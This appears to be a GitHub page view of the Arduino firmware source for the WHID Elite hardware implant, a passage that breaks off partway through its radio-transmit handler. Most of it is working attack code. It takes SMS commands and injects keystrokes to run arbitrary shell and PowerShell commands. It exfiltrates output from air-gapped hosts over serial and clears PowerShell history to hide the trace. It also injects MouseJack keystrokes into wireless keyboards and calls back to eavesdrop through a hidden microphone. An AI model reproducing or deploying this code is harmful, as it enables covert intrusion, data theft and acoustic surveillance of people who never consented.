-
Notifications
You must be signed in to change notification settings - Fork 46
/
Copy pathWHID_Elite_v.1.3.1.ino
1253 lines (1159 loc) · 52.1 KB
/
WHID_Elite_v.1.3.1.ino
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
// ###################################################################################################
// # WHID Elite 1.3.1 ###
// # Copyright 2018-2019 - @LucaBongiorni ###
// ###################################################################################################
// # The MouseJacking portion of code has been re-adapted from ###
// # https://github.com/insecurityofthings/uC_mousejack ###
// ###################################################################################################
// ### NOTE: If the Airgap doesn't type keystrokes properly, is because of atmega32u4 is ###
// ### running our of memory. Which means you uploaded a too-big attack.h payload. ###
// ###################################################################################################
// ##################################### Commands Available ##########################################
// ###################################################################################################
// ### batt: ### Example: ### batt: #
// ### enumos: ### Example: ### enumos: #
// ### airgapwin:<COMMAND-TO-EXFIL> ### Example: ### airgapwin:whoami #
// ### airgapnix:<COMMAND-TO-EXFIL> ### Example: ### airgapnix:whoami #
// ### airgaposx:<COMMAND-TO-EXFIL> ### Example: ### airgaposx:whoami #
// ### win:<COMMAND> ### Example: ### win:iexplore -k http://fakeupdate.net/wnc/ #
// ### nix:<COMMAND> ### Example: ### nix:gnome-calculator #
// ### osx:<COMMAND> ### Example: ### osx:open -n -a calculator #
// ### spy:<PHONE-NUMBER> ### Example: ### spy:0039123123123 #
// ### mousejack: ### Example: ### mousejack: #
// ### mousescan: ### Example: ### mousescan: #
// ### asktxD11:<BINARY-PATTERN> ### Example: ### asktxD11:101001011110101100000100 (Pin D11) #
// ### asktxD7:<BINARY-PATTERN> ### Example: ### asktxD7:101001011110101100000100 (Pin D7) #
// ### jamD11:<TIME-IN-MILLISECONDS> ### Example: ### jamD11:60000 (Pin D11) #
// ### jamD7:<TIME-IN-MILLISECONDS> ### Example: ### jamD7:60000 (hardcoded 10s for now)(Pin D7) #
// ### askrx: ### Example: ### askrx: (Pin D3) # <<< NOTE <<< For now I am taking the 3.7V and the GND from the P2 pins! But I rather suggest to use the P3 with Vcc at 5V (It requires an external Powerbank/PC connected over UBS or P3).
// ### sniff&fuzz: ### Example: ### sniff&fuzz: (Pin D3 & D7) #
// ### getlocation: ### Example: ### getlocation: #
// ###################################################################################################
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// The asktx work with ONE TX connected per time for each Pin (i.e. D7, D11), I guess is matter of current absorbtion. The board cannot handle 2TX concurrently connected on the SAME Pin!
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// Reminder: Lines 575 and 582 have been commented out. If you see instability with SIM800, uncomment them again.
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#include "Adafruit_FONA.h"
#include "FingerprintUSBHost.h"
#include <Keyboard.h>
//#include <Mouse.h>
//-------------------------- MOUSEJACK STUFF -------------------------------------------------
#include "SPI.h"
#include "nRF24L01.h"
#include "RF24.h"
#include "attack.h"
#define CE 5
#define CSN 6
#define PKT_SIZE 37
#define PAY_SIZE 32
#define MICROSOFT 1
#define LOGITECH 2
//-------------------------- MOUSEJACK STUFF --------------------------------------------------
//-------------------------- 315/433MHz STUFF -------------------------------------------------
#include <RCSwitch.h>
//Uncomment two lines below, in case u need create ad-hoc pulses with digitalWrite(11, HIGH); in the command asktx:.
//#define transmitPin 11 //Or 7 in case you use the D7 Pin.
//int timeDelay = 135;
RCSwitch RF = RCSwitch();
int dontSMS=0; // Set to 1 to save SMS
// Dec to Bin https://forum.arduino.cc/index.php?topic=412553.0
char *tobin32(unsigned long x)
{
static char b[33]; //this size should be enough for any ASK/OOK protocol out there. If not, change it accordingly.
b[32] = '\0';
for ( int z = 0; z < 32; z++) {
b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
}
return b;
}
//-------------------------- 315/433MHz STUFF -------------------------------------------------
#define FONA_RX 2
#define FONA_TX 3
#define FONA_RST 4
HardwareSerial *fonaSerial = &Serial1;
Adafruit_FONA fona = Adafruit_FONA(FONA_RST);
uint8_t readline(char *buff, uint8_t maxbuff, uint16_t timeout = 0);
//This function return the amount of free memory available. Is used only for debugging.
int freeRam () {
extern int __heap_start, *__brkval;
int v;
return (int) &v - (__brkval == 0 ? (int) &__heap_start : (int) __brkval);
}
//-------------------------- MOUSEJACK STUFF -------------------------------------------------
RF24 radio(CE, CSN);
long time;
long hops;
int ledpin = 13;
uint64_t promisc_addr = 0xAALL;
uint8_t channel = 25;
uint64_t address;
uint8_t payload[PAY_SIZE];
uint8_t payload_size;
bool payload_encrypted = false;
uint8_t payload_type = 0;
uint16_t sequence;
void print_payload_details() {
Serial.print(F("ch: "));
Serial.print(channel);
Serial.print(F(" s: "));
Serial.print(payload_size);
Serial.print(F(" a: "));
for (int j = 0; j < 5; j++)
{
Serial.print((uint8_t)(address >> (8 * j) & 0xff), HEX);
Serial.print(F(" "));
}
Serial.print(" p: ");
for (int j = 0; j < payload_size; j++)
{
Serial.print(payload[j], HEX);
Serial.print(F(" "));
}
Serial.println(F(""));
return;
}
// Update a CRC16-CCITT with 1-8 bits from a given byte
uint16_t crc_update(uint16_t crc, uint8_t byte, uint8_t bits) {
crc = crc ^ (byte << 8);
while (bits--)
if ((crc & 0x8000) == 0x8000) crc = (crc << 1) ^ 0x1021;
else crc = crc << 1;
crc = crc & 0xFFFF;
return crc;
}
uint8_t writeRegister(uint8_t reg, uint8_t value) {
uint8_t status;
digitalWrite(CSN, LOW);
status = SPI.transfer( W_REGISTER | ( REGISTER_MASK & reg ) );
SPI.transfer(value);
digitalWrite(CSN, HIGH);
return status;
}
uint8_t writeRegister(uint8_t reg, const uint8_t* buf, uint8_t len) {
uint8_t status;
digitalWrite(CSN, LOW);
status = SPI.transfer( W_REGISTER | ( REGISTER_MASK & reg ) );
while (len--)
SPI.transfer(*buf++);
digitalWrite(CSN, HIGH);
return status;
}
bool transmit() {
print_payload_details();
radio.write(payload, payload_size);
return true;
}
void scan() {
Serial.println(F("Scanning..."));
//Serial.print(F("Free RAM: "));
//Serial.println(freeRam());
int x, offset;
uint8_t buf[PKT_SIZE];
uint16_t wait = 100;
uint8_t payload_length;
uint16_t crc, crc_given;
// The order of the following is VERY IMPORTANT
radio.setAutoAck(false);
// radio.setPALevel(RF24_PA_MIN);
// radio.setDataRate(RF24_2MBPS);
//writeRegister(RF_SETUP, 0x09); // Disable PA, 2M rate, LNA enabled // Default 0x09 (in binary 1001).
// More info https://nrqm.ca/nrf24l01/firmware/rf_setup-register/ Where 1-2 bits can be 00 for -18dBm (MIN)[0x09] or 11 0dBm (MAX)[0x0f]
writeRegister(RF_SETUP, 0x0f); // 0x0f (in binary 1111): RF Max, 2M Rate, LNA enabled
radio.setPayloadSize(32);
radio.setChannel(channel);
// RF24 doesn't ever fully set this -- only certain bits of it
writeRegister(EN_RXADDR, 0x00);
// RF24 doesn't have a native way to change MAC...
// 0x00 is "invalid" according to the datasheet, but Travis Goodspeed found it works :)
writeRegister(SETUP_AW, 0x00);
radio.openReadingPipe(0, promisc_addr);
radio.disableCRC();
radio.startListening();
//radio.printDetails();
hops = 0;
while (hops < 5000) { //The more you increase this value, the longer the NRF chipset will scan for vulnerable Mice & Keyboards! (Default: 2000)
hops++;
//Serial.print(F("Channel Hops: "));
//Serial.println(F(hops));
channel++;
if (channel > 84) {
//Serial.println(F("Channel Hopping..."));
Serial.print(F("Free RAM: "));
Serial.println(freeRam());
channel = 2;
}
radio.setChannel(channel);
time = millis();
while (millis() - time < wait)
{
if (radio.available())
{
radio.read(&buf, sizeof(buf));
// In promiscuous mode without a defined address prefix, we attempt to
// decode the payload as-is, and then shift it by one bit and try again
// if the first attempt did not pass the CRC check. The purpose of this
// is to minimize missed detections that happen if we were to use both
// 0xAA and 0x55 as the nonzero promiscuous mode address bytes.
for (offset = 0; offset < 2; offset++) {
// Shift the payload right by one bit if this is the second pass
if (offset == 1) {
for (x = 31; x >= 0; x--) {
if (x > 0) buf[x] = buf[x - 1] << 7 | buf[x] >> 1;
else buf[x] = buf[x] >> 1;
}
}
// Read the payload length
payload_length = buf[5] >> 2;
// Check for a valid payload length, which is less than the usual 32 bytes
// because we need to account for the packet header, CRC, and part or all
// of the address bytes.
if (payload_length <= (PAY_SIZE - 9))
{
// Read the given CRC
crc_given = (buf[6 + payload_length] << 9) | ((buf[7 + payload_length]) << 1);
crc_given = (crc_given << 8) | (crc_given >> 8);
if (buf[8 + payload_length] & 0x80) crc_given |= 0x100;
// Calculate the CRC
crc = 0xFFFF;
for (x = 0; x < 6 + payload_length; x++) crc = crc_update(crc, buf[x], 8);
crc = crc_update(crc, buf[6 + payload_length] & 0x80, 1);
crc = (crc << 8) | (crc >> 8);
// Verify the CRC
if (crc == crc_given) {
Serial.print(F("Found packet /w valid crc... "));
if (payload_length > 0) {
// Write the address
address = 0;
for (int i = 0; i < 4; i++)
{
address += buf[i];
address <<= 8;
}
address += buf[4];
// Write the ESB payload to the output buffer
for (x = 0; x < payload_length + 3; x++)
payload[x] = ((buf[6 + x] << 1) & 0xFF) | (buf[7 + x] >> 7);
payload_size = payload_length;
print_payload_details();
return;
} else {
Serial.println(F("Payload is empty. Keep scanning."));
}
}
}
}
}
}
}
}
void start_transmit() {
radio.stopListening();
radio.openWritingPipe(address);
radio.openReadingPipe(1, address);
radio.setAutoAck(true);
radio.setPALevel(RF24_PA_MAX);
radio.setDataRate(RF24_2MBPS);
radio.setPayloadSize(32);
radio.enableDynamicPayloads();
writeRegister(SETUP_AW, 0x03); // Reset addr size to 5 bytes
radio.setRetries(5, 15); // retransmission: interval and count
radio.setChannel(channel);
return;
}
void ms_crypt() { // Decrypt those keyboard packets!
for (int i = 4; i < payload_size; i++)
payload[i] ^= address >> (((i - 4) % 5) * 8) & 0xFF;
}
void ms_checksum() { // Calculate microsoft wireless keyboard checksum
int last = payload_size - 1;
payload[last] = 0;
for (int i = 0; i < last; i++)
payload[last] ^= payload[i];
payload[last] = ~payload[last];
}
void fingerprint() {
if (payload_size == 19 && payload[0] == 0x08 && payload[6] == 0x40) {
Serial.println(F("MS"));
payload_type = MICROSOFT;
return;
//It was declared globally as uint8_t payload_type = 0;
}
if (payload_size == 19 && payload[0] == 0x0a) {
Serial.println(F("MS-Enc"));
payload_type = MICROSOFT;
payload_encrypted = true;
return;
}
if (payload[0] == 0) {
if (payload_size == 10 && (payload[1] == 0xC2 || payload[1] == 0x4F))
payload_type = LOGITECH;
if (payload_size == 22 && payload[1] == 0xD3)
payload_type = LOGITECH;
if (payload_size == 5 && payload[1] == 0x40)
payload_type = LOGITECH;
if (payload_type == LOGITECH) {
Serial.println(F("Logitech"));
}
}
return;
}
void ms_transmit(uint8_t meta, uint8_t hid) {
if (payload_encrypted) ms_crypt();
for (int n = 4; n < payload_size; n++)
payload[n] = 0;
payload[4] = sequence & 0xff;
payload[5] = sequence >> 8 & 0xff;
payload[6] = 67;
payload[7] = meta;
payload[9] = hid;
ms_checksum();
if (payload_encrypted) ms_crypt();
//Send keystroke (key down)
transmit();
delay(5);
sequence++;
if (payload_encrypted) ms_crypt();
for (int n = 4; n < payload_size; n++)
payload[n] = 0;
payload[4] = sequence & 0xff;
payload[5] = sequence >> 8 & 0xff;
payload[6] = 67;
ms_checksum();
if (payload_encrypted) ms_crypt();
//Send null keystroke (key up)
transmit();
delay(5);
sequence++;
return;
}
void log_checksum() {
uint8_t cksum = 0xff;
int last = payload_size - 1;
for (int n = 0; n < last; n++)
cksum -= payload[n];
cksum++;
payload[last] = cksum;
}
void log_transmit(uint8_t meta, uint8_t keys2send[], uint8_t keysLen) {
// setup empty payload
payload_size = 10;
for (int n; n < payload_size; n++)
payload[n] = 0;
// prepare key down frame
payload[1] = 0xC1;
payload[2] = meta;
for (int q = 0; q < keysLen; q++)
payload[3 + q] = keys2send[q];
log_checksum();
// send key down
transmit();
delay(5);
// prepare key up (null) frame
payload[2] = 0;
payload[3] = 0;
payload[4] = 0;
payload[5] = 0;
payload[6] = 0;
payload[7] = 0;
payload[8] = 0;
log_checksum();
// send key up
transmit();
delay(5);
return;
}
void launch_attack() {
//Serial.println(F("Starting attack..."));
if (payload_type) {
//Serial.println(F("Payload type is injectable"));
start_transmit();
uint8_t meta = 0;
uint8_t hid = 0;
uint8_t wait = 0;
int offset = 0;
uint8_t keys2send[6];
uint8_t keysLen = 0;
int keycount = sizeof(attack) / 3;
sequence = 0;
// This is to sync the new serial
if (payload_type == MICROSOFT) {
for (int i = 0; i < 6; i++) {
ms_transmit(0, 0);
}
}
// Now inject the hid codes
for (int i = 0; i <= keycount; i++)
{
offset = i * 3;
meta = attack[offset];
hid = attack[offset + 1];
wait = attack[offset + 2];
if (payload_type == LOGITECH) {
if (meta) {
if (keysLen > 0) {
log_transmit(0, keys2send, keysLen);
keysLen = 0;
}
keys2send[0] = hid;
log_transmit(meta, keys2send, 1);
keysLen = 0;
} else if (hid) {
//Serial.print(F("hid code: "));
//Serial.println(hid);
bool dup = false;
for (int j = 0; j < keysLen; j++) {
if (keys2send[j] == hid)
dup = true;
}
if (dup) {
log_transmit(meta, keys2send, keysLen);
keys2send[0] = hid;
keysLen = 1;
} else if (keysLen == 5) {
keys2send[5] = hid;
keysLen = 6;
log_transmit(meta, keys2send, keysLen);
keysLen = 0;
} else {
keys2send[keysLen] = hid;
keysLen++;
}
} else if (wait) {
if (keysLen > 0) {
log_transmit(meta, keys2send, keysLen);
keysLen = 0;
}
// Serial.println(F("Waiting"));
delay(wait << 4);
}
if (i == keycount && keysLen > 0) {
log_transmit(meta, keys2send, keysLen);
}
}
if (payload_type == MICROSOFT) {
if (hid) {
//Serial.print(F("Sending HID code: "));
//Serial.println(F(hid));
ms_transmit(meta, hid);
}
if (wait) {
//Serial.println("waiting");
delay(wait << 4);
}
}
}
}
return;
}
void reset() {
payload_type = 0;
payload_encrypted = false;
payload_size = 0;
for (int i = 0; i < PAY_SIZE; i++) {
payload[i] = 0;
}
radio.begin();
}
//-------------------------- MOUSEJACK STUFF -------------------------------------------------
char fonaNotificationBuffer[64];
char smsBuffer[150]; //Default 250. If changed, need also to change Line 615 accordingly.
void typeKey(uint8_t key) {
Keyboard.press(key);
delay(50);
Keyboard.release(key);
}
void setup() {
Keyboard.begin();
// ------ Initialize SIM800 ------
pinMode(13, OUTPUT);
digitalWrite(13, LOW); //(SIM800 gets resetted ONLY when RST is pulled LOW)
delay(50);
digitalWrite(13, HIGH);
pinMode(2, OUTPUT);
digitalWrite(2, HIGH); //HIGH == connected to GND
delay(1000);
digitalWrite(2, LOW);
// ------ Initialize SIM800 ------
// #########################################################################################
// ##### This must be commented. Otherwise the script will never start automatically. ######
// ##### Uncomment, only if you wanna use serial monitor to debug the whole workflow ######
// ##### and you wanna start SIM800 manually. ######
// #########################################################################################
//while (!Serial);
// #########################################################################################
Serial.begin(4800);
fonaSerial->begin(4800);
if (! fona.begin(*fonaSerial)) {
Serial.println(F("NO SIM800!"));
while (1);
}
fona.unlockSIM("1234"); // ### Change this to your SIM's Pincode (if any) ###
//fonaSerial->print("AT+CLCK=\"SC\",0,\"1234\"\r\n"); // ### This remove permanently your SIM's Pincode ###
//delay(3000); //###LBO: Original Working Delay
delay(1000);
fonaSerial->print("AT+CNMI=2,1\r\n"); //Set up the SIM800 to send a +CMTI notification when an SMS is received
delay(500);
fona.setGPRSNetworkSettings(F("internet")); //### APN Setting in case you MNO requires specific ones ###
while(true){
int i = fona.getNumSMS();
Serial.print(F("Number of SMS: "));
Serial.println(i);
if(i != -1){
Serial.println(F("\n\rDeleting SMS..."));
delay(500);
if(fona.sendCheckReply(F("AT+CMGDA=\"DEL ALL\"\r\n"), F("OK"), 100)){
break;
}
}
if(i==0) break;
delay(500);
}
// fonaSerial->print("AT+CLIR=1\r\n"); //### Uncomment this to hide WHIDelite number while calling ###
Serial.println(F("WHID Elite 1.3.1 is OK"));
}
void loop() {
//delay(3000); //###LBO: Original Working Delay
delay(1000);
char* bufPtr = fonaNotificationBuffer;
if (fona.available()) {
//Serial.println(F("WHID Elite 1.3.1 is OK"));
int slot = 0;
int charCount = 0;
//Read the notification into fonaInBuffer
do {
*bufPtr = fona.read();
Serial.write(*bufPtr);
delay(1);
} while ((*bufPtr++ != '\n') && (fona.available()) && (++charCount < (sizeof(fonaNotificationBuffer) - 1)));
//Add a terminal NULL to the notification string
*bufPtr = 0;
//Scan the notification string for an SMS received notification.
// If it's an SMS message, we'll get the slot number in 'slot'
if (1 == sscanf(fonaNotificationBuffer, "+CMTI: " FONA_PREF_SMS_STORAGE ",%d", &slot)) {
Serial.print(F("slot: ")); Serial.println(slot);
char callerIDbuffer[32]; //We'll store the SMS sender number in here
// Retrieve SMS sender address/phone number.
if (! fona.getSMSSender(slot, callerIDbuffer, 31)) {
Serial.println(F("Didn't find SMS message in slot!"));
}
//Serial.print(F("FROM: ")); Serial.println(callerIDbuffer);
// Retrieve SMS value.
uint16_t smslen;
if (fona.readSMS(slot, smsBuffer, 150, &smslen)) { //Default 250. If changed, need also to change Line 538 accordingly.
//############################################################################################
//######################### HERE ARE STARTING THE COMMANDS AVAILABLE #########################
//############################################################################################
//####### airgapwin: ################################################################################################################################
//# It opens a powershell, types the exfil-payload (with the payload contained into the SMS that you want to exfiltrate. e.g. whoami), then runs it.
//###################################################################################################################################################
if (strncmp(smsBuffer, "airgapwin:", 10) == 0) {
//Serial.print(F("Free RAM: "));
//Serial.println(freeRam());
delay(500);
Keyboard.press(KEY_LEFT_GUI);
delay(50);
Keyboard.press((char) 114); //In Decimal, is r
Keyboard.releaseAll();
delay(1000);
Keyboard.print("powershell"); // we need to type cmd and then insert payload there, because of a RUN textbox limitation buffer of 260 chars.
delay(1000);
typeKey(KEY_RETURN);
delay(1000);
Keyboard.print(F("$c=(gwmi Win32_SerialPort|Where-Object{$_.PNPDeviceID -match \"ID_1B4F&PID_9208\"}).DeviceID;$r="));
delay(300);
Keyboard.print(smsBuffer + 10);
delay(300);
// Clear-History or ALT+F7
Keyboard.print(F(";$p=new-Object System.IO.Ports.SerialPort $c,4800,None,8,one;$p.open();$p.WriteLine(\"BAG:$r\");$p.Close();Clear-History -CommandLine \"*$*\";exit;"));
delay(1000);
typeKey(KEY_RETURN);
delay(1000);
}
//####### airgapnix: ###########################################################################################################################
//# It opens a shell, types the exfil-payload (with the payload contained into the SMS that you want to exfiltrate. e.g. whoami), then runs it.
//##############################################################################################################################################
else if (strncmp(smsBuffer, "airgapnix:", 10) == 0) {
delay(500);
Keyboard.press(KEY_LEFT_GUI);
delay(50);
Keyboard.releaseAll();
delay(1000);
Keyboard.print("term");
delay(1500);
typeKey(KEY_RETURN);
delay(1200);
/* // <-- change to //*
Keyboard.print(F("sleep .5;stty -F /dev/serial/by-id/\*LilyPad\* 4800;echo -e \"BAG:\"$("));
delay(300);
Keyboard.print(smsBuffer + 10);
delay(300);
Keyboard.print(F(")\"\" > /dev/serial/by-id/\*LilyPad\*;exit"));
/*/
Keyboard.print(F(" sleep .5;l=$(ls /dev/serial/by-id/*LilyPad*);stty -F $l 4800;echo BAG:$(echo $("));
delay(300);
Keyboard.print(smsBuffer + 10);
delay(300);
Keyboard.print(F(")) > $l;exit"));
//*/
delay(1500);
typeKey(KEY_RETURN);
delay(1500);
}
//####### airgaposx: ###########################################################################################################################
//# It opens a shell, types the exfil-payload (with the payload contained into the SMS that you want to exfiltrate. e.g. whoami), then runs it
//##############################################################################################################################################
//TODO: Despite it works, there is a bug. It doesn't like symbols. Need to sanitize them with with quotes or backslash. (e.g. airgapnix:uname -a >>>> FAIL / aigapnix:uname >>>> PASS)
else if (strncmp(smsBuffer, "airgaposx:", 10) == 0) {
delay(500);
Keyboard.press(KEY_LEFT_GUI);
delay(50);
Keyboard.press((char) 32); //In Decimal, is SPACE
Keyboard.releaseAll();
delay(1000);
Keyboard.print("terminal.app");
delay(1000);
typeKey(KEY_RETURN);
delay(1000);
Keyboard.print(F("sleep .5;stty -f /dev/cu.usbmodemHID* 4800;echo -e \"BAG:\"$(")); //not sure if in all OSX machines, WHID Elite's serial port is identified a scu.usbmodemHIDF1, it may need more checks
delay(300);
Keyboard.print(smsBuffer + 10);
delay(300);
Keyboard.print(F(") > /dev/cu.usbmodemHID*;")); //Not sure if in all OSX machines, WHID Elite's serial port is identified as cu.usbmodemHIDF1 or cu.usbmodemHIDFG1 or cu.usbmodemHIDPC1 , it may need more checks.
//If you do plug WHID Elite into an OSX-based machine… can you send me the output of this command: ls /dev/cu*
delay(1000);
typeKey(KEY_RETURN);
delay(1000);
Keyboard.press(KEY_LEFT_GUI); //CMD
delay(50);
Keyboard.press((char) 113); //q
Keyboard.releaseAll(); //CMD + q >> quits focused window
}
//####### win: #############################################################################
//# It runs GUI+r, opens a CMD shell and executes the payload contained into the SMS
//##########################################################################################
else if (strncmp(smsBuffer, "win:", 4) == 0) {
// It runs GUI+r, opens a CMD shell and executes the payload contained into the SMS
delay(500);
Keyboard.press(KEY_LEFT_GUI);
delay(50);
Keyboard.press((char) 114); //In Decimal, is r
//Keyboard.write((char) 0x72); //In Hex
Keyboard.releaseAll();
delay(1000);
Keyboard.print((smsBuffer + 4));
delay(1000);
typeKey(KEY_RETURN);
delay(1000);
}
//####### nix: #############################################################################
//# It runs ALT + F2, opens a shell and executes the payload contained into the SMS
//##########################################################################################
else if (strncmp(smsBuffer, "nix:", 4) == 0) {
// It runs ALT + F2, opens a shell and executes the payload contained into the SMS
delay(500);
Keyboard.press(KEY_LEFT_GUI);
delay(50);
Keyboard.releaseAll();
delay(1000);
// No need for terminal ALT-F2 straight runs commands
// And it is multi-desktop solution
Keyboard.print("term");
delay(1500);
typeKey(KEY_RETURN);
delay(1500);
Keyboard.print(" ");
Keyboard.print(smsBuffer + 4);
Keyboard.print(";exit");
delay(1500);
typeKey(KEY_RETURN);
delay(1000);
}
//####### osx: #############################################################################
//# It opens a shell and executes the payload contained into the SMS
//##########################################################################################
else if (strncmp(smsBuffer, "osx:", 4) == 0) {
// It opens a shell and executes the payload contained into the SMS
delay(500);
Keyboard.press(KEY_LEFT_GUI);
delay(50);
Keyboard.press((char) 32); //In Decimal, is SPACE
Keyboard.releaseAll();
delay(1000);
Keyboard.print("terminal.app");
delay(1000);
typeKey(KEY_RETURN);
delay(1000);
Keyboard.print(smsBuffer + 4);
delay(1000);
typeKey(KEY_RETURN);
//Uncomment if needed. It all depends from which type of remote commands you are planning to send. ;)
// delay(1000);
// Keyboard.press(KEY_LEFT_GUI); //CMD
// delay(50);
// Keyboard.press((char) 113); //q
// Keyboard.releaseAll(); //CMD + q >> quits focused window
}
//####### spy: ############################################
//# It enables the internal Microphone and calls you back.
//#########################################################
else if (strncmp(smsBuffer, "spy:", 4) == 0) {
//In case you have troubles to hear the audio from WHID Elite, try uncommenting these lines.
// if (! fona.setAudio(FONA_EXTAUDIO)) {
// Serial.println(F("Error while enabling Mic!"));
// }
// else {
// Serial.println(F("Mic Enabled!"));
// }
// fona.setMicVolume(FONA_EXTAUDIO, 10);
delay(1000);
if (!fona.callPhone((smsBuffer + 4))) {
Serial.println(F("Call Failed"));
} else {
Serial.println(F("### STARTING ACOUSTIC SURVEILLANCE ###"));
delay(1000);
}
}
//####### mousejack: ############
//# Starts Mousejack attack
//###############################
else if (strncmp(smsBuffer, "mousejack:", 10) == 0) {
// The mousejack attack is done 2 times, due to the hit-or-miss nature, some keystrokes may be missed during the one attack.
// TODO: Add multi-payload selection. i.e. mousejack:attack2. (check WHID_Elite_attack.h_1.2.3.1.ino)
// I know, dirty as fuck, but works and is late night.
reset();
scan();
fingerprint();
launch_attack();
reset();
scan();
fingerprint();
launch_attack();
//reset();
//scan();
//fingerprint();
//launch_attack();
}
//####### mousescan: ####################################
//# Scan for Mousejackable devices. If found, send SMS.
//#######################################################
else if (strncmp(smsBuffer, "mousescan:", 10) == 0) {
reset();
scan();
fingerprint();
if (payload_type == MICROSOFT) {
fona.sendSMS(callerIDbuffer, "MICROSOFT");
}
else if (payload_type == LOGITECH) {
fona.sendSMS(callerIDbuffer, "LOGITECH");
}
}
//-------------------------- 315/433MHz STUFF -------------------------------------------------
//####### asktxD11: #############################################################################
//# Transmit on Pin D11 325/433MHz an arbitrary binary sequence with OOK/ASK Encoding/Modulation
//###############################################################################################
// ############################################################################################################################
// #### For some reasons there is a bug... rcswitch adds one zero more... so remove the last one from the signal binary!!! ####
// ############################################################################################################################
// ### Example: ###
// 1010010111101011000001000 // original signal
// 101001011110101100000100 //to use (see! one zero less at the end)
// Hard-coded binary sequence for testing purposes.
// RF.send("101001011110101100000100"); // GSM Alarm at 433MHz
// RF.send("010101010101010100001100"); // RFID RFLock at 315MHz
else if (strncmp(smsBuffer, "asktxD11:", 9) == 0) {
delay(1000);
// Transmitter is connected to Atmega 32u4 Pin D11
// Wiring of external 433/315MHz TX:
// GND >> GND
// DATA >> D11
// VCC >> VCC
RF.enableTransmit(11); //Pin D11
// Optional set protocol (default is 1, will work for most outlets)
// RF.setProtocol(2);
